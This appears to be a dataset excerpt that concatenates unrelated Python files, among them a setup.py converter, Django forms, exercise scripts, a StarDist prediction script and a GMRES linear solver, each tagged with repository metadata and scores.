isinstance(node.body[0].value, ast.Call) and
isinstance(node.body[0].value.func, ast.Attribute) and
# .read()
node.body[0].value.func.attr == 'read' and
# fvar.
isinstance(node.body[0].value.func.value, ast.Name) and
(
node.body[0].value.func.value.id ==
node.items[0].optional_vars.id
)
):
varname = node.body[0].targets[0].id
filename = node.items[0].context_expr.args[0].s
self._files[varname] = filename
self.generic_visit(node)
def visit_Call(self, node: ast.Call) -> None:
if is_setuptools_attr_call(node, 'setup'):
for kwd in node.keywords:
if kwd.arg in METADATA_KEYS:
section = 'metadata'
elif kwd.arg in OPTIONS_KEYS:
section = 'options'
else:
raise SystemExit(
f'{kwd.arg}= is not supported in setup.cfg',
)
if (
isinstance(kwd.value, ast.Name) and
kwd.value.id in self._files
):
value = f'file: {self._files[kwd.value.id]}'
elif (
isinstance(kwd.value, ast.Call) and
is_setuptools_attr_call(kwd.value, 'find_packages')
):
find_section = {
k: ast.literal_eval(v)
for k, v in zip(FIND_PACKAGES_ARGS, kwd.value.args)
}
find_section.update({
kwd.arg: ast.literal_eval(kwd.value)
for kwd in kwd.value.keywords
if kwd.arg is not None # for mypy's sake
})
self.sections['options.packages.find'] = find_section
value = 'find:'
else:
try:
value = ast.literal_eval(kwd.value)
except ValueError:
raise NotImplementedError(f'unparsable: {kwd.arg}=')
self.sections[section][kwd.arg] = value
self.generic_visit(node)
def _list_as_str(lst: Sequence[str]) -> str:
if len(lst) == 1:
return lst[0]
else:
return '\n' + '\n'.join(lst)
def _dict_as_str(dct: Dict[str, str]) -> str:
return _list_as_str([f'{k}={v}' for k, v in dct.items()])
def _reformat(section: Dict[str, Any]) -> Dict[str, Any]:
new_section = {}
for key, value in section.items():
if isinstance(value, (list, tuple)):
new_section[key] = _list_as_str(value)
elif isinstance(value, dict):
new_section[key] = _dict_as_str(value)
else:
new_section[key] = value
return new_section
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument('directory')
args = parser.parse_args(argv)
setup_py = os.path.join(args.directory, 'setup.py')
with open(setup_py, 'rb') as setup_py_f:
tree = ast.parse(setup_py_f.read(), filename=setup_py)
visitor = Visitor()
visitor.visit(tree)
for option_section in OPTIONS_AS_SECTIONS:
if option_section in visitor.sections['options']:
section = visitor.sections['options'].pop(option_section)
visitor.sections[f'options.{option_section}'] = section
for k in tuple(visitor.sections.get('options.extras_require', {})):
if k.startswith(':'):
deps = visitor.sections['options.extras_require'].pop(k)
ir = visitor.sections['options'].setdefault('install_requires', [])
for dep in deps:
ir.append(f'{dep};{k[1:]}')
sections = {k: _reformat(v) for k, v in visitor.sections.items() if v}
# always want these to start with a newline
for section in ('entry_points', 'package_data', 'exclude_package_data'):
for k, v in dict(sections.get(f'options.{section}', {})).items():
if '\n' not in v:
if k == '':
sections[f'options.{section}'].pop(k)
k = '*'
sections[f'options.{section}'][k] = f'\n{v}'
# always start project_urls with a newline as well
if sections.get('metadata', {}).get('project_urls'):
project_urls = sections['metadata']['project_urls']
if not project_urls.startswith('\n'):
sections['metadata']['project_urls'] = f'\n{project_urls}'
cfg = configparser.ConfigParser()
cfg.update(sections)
setup_cfg = os.path.join(args.directory, 'setup.cfg')
if os.path.exists(setup_cfg):
orig = configparser.ConfigParser()
orig.read(setup_cfg)
for section_name, section in orig.items():
for k, v in section.items():
# a shame `setdefault(...)` doesn't work
if not cfg.has_section(section_name):
cfg.add_section(section_name)
cfg[section_name][k] = v
with open(setup_py, 'w') as f:
f.write('from setuptools import setup\nsetup()\n')
sio = io.StringIO()
cfg.write(sio)
with open(setup_cfg, 'w') as f:
contents = sio.getvalue().strip() + '\n'
contents = contents.replace('\t', ' ')
contents = contents.replace(' \n', '\n')
f.write(contents)
print(f'{setup_py} and {setup_cfg} written!')
return 0
if __name__ == '__main__':
raise SystemExit(main())
| 1.835938 | 2 |
main/models/__init__.py | prajnamort/LambdaOJ2 | 2 | 11091 | <gh_stars>1-10
from .user import User, MultiUserUpload
from .problem import Problem, TestData
from .submit import Submit
| 0.976563 | 1 |
2019/tests/test_Advent2019_10.py | davidxbuck/advent2018 | 1 | 11092 | <reponame>davidxbuck/advent2018<gh_stars>1-10
# pytest tests
import numpy as np
from Advent2019_10 import Day10
class TestDay10():
def test_instantiate(self):
test = Day10('../tests/test_Advent2019_10a.txt')
grid = ['.#..#',
'.....',
'#####',
'....#',
'...##']
grid = [list(x) for x in grid]
gridarray = np.array(grid).transpose()
boolgrid = (gridarray == "#")
assert (gridarray[3, :] == list('..#.#')).all()
assert (gridarray[:, 2] == list('#####')).all()
assert (boolgrid[:, 2] == [True, True, True, True, True]).all()
assert (test.asteroid_map == gridarray).all()
assert (test.boolean_asteroid_map == boolgrid).all()
| 2.71875 | 3 |
Hash Map/448. Find All Numbers Disappeared in an Array.py | xli1110/LC | 2 | 11093 | <reponame>xli1110/LC
class Solution:
def findDisappearedNumbers(self, nums: List[int]) -> List[int]:
if len(nums) < 1:
raise Exception("Invalid Array")
n = len(nums)
res = []
s = set()
for x in nums:
s.add(x)
for i in range(1, n + 1):
if i not in s:
res.append(i)
return res
| 3.171875 | 3 |
tests/test_demo.py | aaronestrada/flask-restplus-swagger-relative | 3 | 11094 | <gh_stars>1-10
import pytest
from tests.test_application import app
@pytest.fixture
def client():
client = app.test_client()
yield client
def test_hello_resource(client):
"""
Test if it is possible to access to /hello resource
:param client: Test client object
:return:
"""
response = client.get('/hello').get_json()
assert response['hello'] == 'world'
def test_asset_found(client):
"""
Test if Swagger assets are accessible from the new path
:param client: Test client object
:return:
"""
response = client.get('/this_is_a_new/path_for_swagger_internal_documentation/swaggerui/swagger-ui-bundle.js')
assert response.status_code is 200
| 2.484375 | 2 |
01_Introduction to Python/3-functions-and-packages/03_multiple-arguments.py | mohd-faizy/DataScience-With-Python | 5 | 11095 | <filename>01_Introduction to Python/3-functions-and-packages/03_multiple-arguments.py
'''
03 - Multiple arguments
In the previous exercise, the square brackets around imag in the documentation showed us that the
imag argument is optional. But Python also uses a different way to tell users about arguments being
optional.
Have a look at the documentation of sorted() by typing help(sorted) in the IPython Shell.
You'll see that sorted() takes three arguments: iterable, key and reverse.
key=None means that if you don't specify the key argument, it will be None. reverse=False means
that if you don't specify the reverse argument, it will be False.
In this exercise, you'll only have to specify iterable and reverse, not key. The first input you
pass to sorted() will be matched to the iterable argument, but what about the second input? To tell
Python you want to specify reverse without changing anything about key, you can use =:
sorted(___, reverse = ___)
Two lists have been created for you on the right. Can you paste them together and sort them in
descending order?
Note: For now, we can understand an iterable as being any collection of objects, e.g. a List.
Instructions:
- Use + to merge the contents of first and second into a new list: full.
- Call sorted() on full and specify the reverse argument to be True. Save the sorted list as
full_sorted.
- Finish off by printing out full_sorted.
'''
# Create lists first and second
first = [11.25, 18.0, 20.0]
second = [10.75, 9.50]
# Paste together first and second: full
full = first + second
# Sort full in descending order: full_sorted
full_sorted = sorted(full, reverse=True)
# Print out full_sorted
print(full_sorted) | 4.6875 | 5 |
Taller_Algoritmos_02/Ejercicio_10.py | Angelio01/algoritmos_programacion- | 0 | 11096 | <reponame>Angelio01/algoritmos_programacion-
"""
Entradas: 3 Valores flotantes que son el valor de diferentes monedas
Chelines autriacos --> float --> x
Dramas griegos --> float --> z
Pesetas --> float --> w
Salidas 4 valores flotantes que es la conversión de las anteriores monedas
Pesetas --> float --> x
Francos franceses --> float --> z
Dolares --> float --> a
Liras italianas --> float --> b
"""
# Entradas
x1 = float(input("Dime los chelines autríacos\n"))
z1 = float(input("Dime los dracmas griegos\n"))
w = float(input("Dime las pesetas\n"))
# Caja negra
x = (x1 * 956871)/100
z = z1/22.64572381
a = w/122499
b = (w*100)/9289
# Salidas
print(f"\n{x1} Chelines austríacos en pesetas son {x}\n{z1} Dracmas griegos en Francos franceses son {z}\n{w} Pesetas en Dolares son {a}\n{w} Pesetas en Liras italianas son {b}\n") | 3.921875 | 4 |
stardist/stardist_impl/predict_stardist_3d.py | constantinpape/deep-cell | 0 | 11097 | import argparse
import os
from glob import glob
import imageio
from tqdm import tqdm
from csbdeep.utils import normalize
from stardist.models import StarDist3D
def get_image_files(root, image_folder, ext):
# get the image and label mask paths and validate them
image_pattern = os.path.join(root, image_folder, f'*{ext}')
print("Looking for images with the pattern", image_pattern)
images = glob(image_pattern)
assert len(images) > 0, "Did not find any images"
images.sort()
return images
# could be done more efficiently, see
# https://github.com/hci-unihd/batchlib/blob/master/batchlib/segmentation/stardist_prediction.py
def run_prediction(image_files, model_path, root, prediction_folder):
# load the model
model_root, model_name = os.path.split(model_path.rstrip('/'))
model = StarDist3D(None, name=model_name, basedir=model_root)
res_folder = os.path.join(root, prediction_folder)
os.makedirs(res_folder, exist_ok=True)
# normalization parameters: lower and upper percentile used for image normalization
# maybe these should be exposed
lower_percentile = 1
upper_percentile = 99.8
ax_norm = (0, 1, 2)
for im_file in tqdm(image_files, desc="run stardist prediction"):
im = imageio.volread(im_file)
im = normalize(im, lower_percentile, upper_percentile, axis=ax_norm)
pred, _ = model.predict_instances(im)
im_name = os.path.split(im_file)[1]
save_path = os.path.join(res_folder, im_name)
imageio.imsave(save_path, pred)
def predict_stardist(root, model_path, image_folder, prediction_folder, ext):
print("Loading images")
image_files = get_image_files(root, image_folder, ext)
print("Found", len(image_files), "images for prediction")
print("Start prediction ...")
run_prediction(image_files, model_path, root, prediction_folder)
print("Finished prediction")
def main():
parser = argparse.ArgumentParser(description="Predict new images with a stardist model")
parser.add_argument('root', type=str, help="Root folder with image data.")
parser.add_argument('model_path', type=str, help="Where the model is saved.")
parser.add_argument('--image_folder', type=str, default='images',
help="Name of the folder with the training images, default: images.")
parser.add_argument('--prediction_folder', type=str, default='predictions',
help="Name of the folder where the predictions should be stored, default: predictions.")
parser.add_argument('--ext', type=str, default='.tif', help="Image file extension, default: .tif")
args = parser.parse_args()
predict_stardist(args.root, args.model_path, args.image_folder,
args.prediction_folder, args.ext)
if __name__ == '__main__':
main()
| 2.4375 | 2 |
estacionamientos/forms.py | ShadowManu/SAGE | 0 | 11098 | <reponame>ShadowManu/SAGE<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import forms
from estacionamientos.models import Estacionamiento, Reserva, Pago
class EstacionamientosForm(forms.ModelForm):
nombre_duenio = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Nombre del Dueño'}))
nombre_est = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Nombre del Estacionamiento'}))
direccion = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Dirección'}))
telefono1 = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Teléfono 1',}))
telefono2 = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Telefono 2',}), required=False)
telefono3 = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Teléfono 3',}), required=False)
email1 = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 1',}))
email2 = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 2',}), required=False)
email3 = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 3',}), required=False)
rif = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'RIF',}))
capacidad = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Capacidad',}))
tarifa = forms.DecimalField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Tarifa',}))
horaI = forms.TimeField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Hora Apertura',}))
horaF = forms.TimeField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Hora Cierre',}))
reservaI = forms.TimeField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Inicio Restringir Reserva',}), required=False)
reservaF = forms.TimeField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Fin Restringir Reserva',}), required=False)
class Meta:
model = Estacionamiento
fields = '__all__'
class ReservaForm(forms.ModelForm):
estacionamiento = forms.ModelChoiceField(
queryset=Estacionamiento.objects.all(),
empty_label="Estacionamiento",
widget=forms.Select(attrs={'class': 'form-control',}))
horaInicio = forms.TimeField(widget=forms.DateInput(
attrs={'class': 'form-control', 'placeholder': 'Inicio de la Reserva',}))
horaFin = forms.TimeField(widget=forms.DateInput(
attrs={'class': 'form-control', 'placeholder': 'Fin de la Reserva',}))
class Meta:
model = Reserva
fields = ['horaInicio', 'horaFin', 'estacionamiento']
class PagoForm(forms.ModelForm):
TARJETAS = [
('', 'Tipo de Tarjeta'),
('Vista', 'Vista'),
('Mister', 'Mister'),
('Xpres', 'Xpres')
]
nombre = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Nombre',}))
cedula = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Cédula',}))
tipoTarjeta = forms.ChoiceField(choices=TARJETAS, widget=forms.Select(attrs={'class': 'form-control'}))
numeroTarjeta = forms.RegexField(min_length=16, max_length=16, regex=r'^(\d)+$',
error_message = ("Número de tarjeta no válido."), widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Número de Tarjeta',}))
class Meta:
model = Pago
fields = ['nombre', 'cedula', 'tipoTarjeta', 'numeroTarjeta', 'pago']
| 2.046875 | 2 |
src/krylov/gmres.py | nschloe/krylov | 36 | 11099 | <gh_stars>10-100
"""
<NAME>, <NAME>,
GMRES: a generalized minimal residual algorithm for solving nonsymmetric linear systems,
SIAM J. Sci. and Stat. Comput., 7(3), 856–869, 1986,
<https://doi.org/10.1137/0907058>.
Other implementations:
<https://petsc.org/release/docs/manualpages/KSP/KSPGMRES.html>
"""
from __future__ import annotations
from typing import Callable
import numpy as np
import scipy.linalg
from numpy.typing import ArrayLike
from ._helpers import (
Identity,
Info,
LinearOperator,
Product,
assert_correct_shapes,
clip_imag,
get_default_inner,
wrap_inner,
)
from .arnoldi import ArnoldiHouseholder, ArnoldiMGS
from .givens import givens
def multi_matmul(A, b):
"""A @ b for many A, b (i.e., A.shape == (m,n,...), y.shape == (n,...))"""
return np.einsum("ij...,j...->i...", A, b)
def multi_solve_triangular(A, B):
"""This function calls scipy.linalg.solve_triangular for every single A. A
vectorized version would be much better here.
"""
A_shape = A.shape
a = A.reshape(A.shape[0], A.shape[1], -1)
b = B.reshape(B.shape[0], -1)
y = []
for k in range(a.shape[2]):
if np.all(b[:, k] == 0.0):
y.append(np.zeros(b[:, k].shape))
else:
y.append(scipy.linalg.solve_triangular(a[:, :, k], b[:, k]))
y = np.array(y).T.reshape([A_shape[0]] + list(A_shape[2:]))
return y
def gmres(
*args,
restart_size: int | None = None,
maxiter: int | None = None,
x0: ArrayLike | None = None,
**kwargs,
) -> tuple[np.ndarray | None, Info]:
if restart_size is None:
return _gmres(*args, maxiter=maxiter, x0=x0, **kwargs)
total_steps = 0
info = None
while True:
sol, info = _gmres(
*args,
maxiter=restart_size
if maxiter is None
else min(restart_size, maxiter - total_steps),
x0=x0 if info is None else info.xk,
**kwargs,
)
total_steps += info.numsteps
if info.success:
break
# override numsteps
info = Info(info.success, info.xk, total_steps, info.resnorms, info.nresnorms)
return sol, info
def _gmres(
A: LinearOperator,
b: ArrayLike,
M: LinearOperator | None = None,
Ml: LinearOperator | None = None,
Mr: LinearOperator | None = None,
inner: Callable | None = None,
ortho: str = "mgs",
x0: ArrayLike | None = None,
tol: float = 1e-5,
atol: float = 1.0e-15,
maxiter: int | None = None,
callback: Callable[[int, np.ndarray, list[np.ndarray]], None] | None = None,
) -> tuple[np.ndarray | None, Info]:
b = np.asarray(b)
assert_correct_shapes(A, b, x0)
n = A.shape[0]
M = Identity(n) if M is None else M
Ml = Identity(n) if Ml is None else Ml
Mr = Identity(n) if Mr is None else Mr
def _get_xk(y):
if y is None:
return x0
k = arnoldi.iter
if k > 0:
yy = multi_solve_triangular(R[:k, :k], y)
# The last is always 0, so we could skip it, too
# yk = sum(c * v for c, v in zip(yy, V[:-1]))
yk = sum(c * v for c, v in zip(yy, arnoldi.V))
return x0 + Mr @ yk
return x0
_inner = get_default_inner(b.shape) if inner is None else wrap_inner(inner)
maxiter = A.shape[0] if maxiter is None else maxiter
if x0 is None:
x0 = np.zeros_like(b)
Ml_r0 = Ml @ b
else:
x0 = np.asarray(x0)
Ml_r0 = Ml @ (b - A @ x0)
M_Ml_r0 = M @ Ml_r0
M_Ml_r0_norm = np.sqrt(clip_imag(_inner(Ml_r0, M_Ml_r0)))
Ml_A_Mr = Product(Ml, A, Mr)
resnorms = [M_Ml_r0_norm]
if callback is not None:
callback(0, x0, resnorms)
# initialize Arnoldi
if ortho.startswith("mgs"):
num_reorthos = 1 if len(ortho) == 3 else int(ortho[3:])
arnoldi = ArnoldiMGS(
Ml_A_Mr,
Ml_r0,
num_reorthos=num_reorthos,
M=M,
Mv=M_Ml_r0,
Mv_norm=M_Ml_r0_norm,
inner=_inner,
)
else:
assert ortho == "householder"
assert inner is None
assert isinstance(M, Identity)
arnoldi = ArnoldiHouseholder(Ml_A_Mr, Ml_r0)
# Givens rotations:
G = []
# QR decomposition of Hessenberg matrix via Givens and R
dtype = M_Ml_r0.dtype
R = np.zeros([maxiter + 1, maxiter] + list(b.shape[1:]), dtype=dtype)
y = np.zeros([maxiter + 1] + list(b.shape[1:]), dtype=dtype)
# Right-hand side of projected system:
y[0] = M_Ml_r0_norm
yk = None
xk = None
# iterate Arnoldi
k = 0
success = False
reason = None
criterion = np.maximum(tol * resnorms[0], atol)
while True:
if np.all(resnorms[-1] <= criterion):
# oh really?
xk = _get_xk(yk) if xk is None else xk
Ml_r = Ml @ (b - A @ xk)
resnorms[-1] = np.sqrt(clip_imag(_inner(Ml_r, M @ Ml_r)))
if np.all(resnorms[-1] <= criterion):
success = True
break
if k == maxiter:
reason = "maxiter reached"
break
# V is used in _get_xk()
_, h = next(arnoldi)
# Copy new column from Arnoldi
R[: k + 2, k] = h[: k + 2]
# Apply previous Givens rotations.
for i in range(k):
R[i : i + 2, k] = multi_matmul(G[i], R[i : i + 2, k])
# Compute and apply new Givens rotation.
g, r = givens(R[k : k + 2, k])
G.append(g)
R[k, k] = r
R[k + 1, k] = 0.0
y[k : k + 2] = multi_matmul(G[k], y[k : k + 2])
yk = y[: k + 1]
resnorm = np.abs(y[k + 1])
xk = None
if callback is not None:
xk = _get_xk(yk) if xk is None else xk
callback(k + 1, xk, resnorms)
resnorms.append(resnorm)
k += 1
# compute solution if not yet done
if xk is None:
xk = _get_xk(y[: arnoldi.iter])
return xk if success else None, Info(
success, xk, k, np.array(resnorms), reason=reason
)
| 2.71875 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.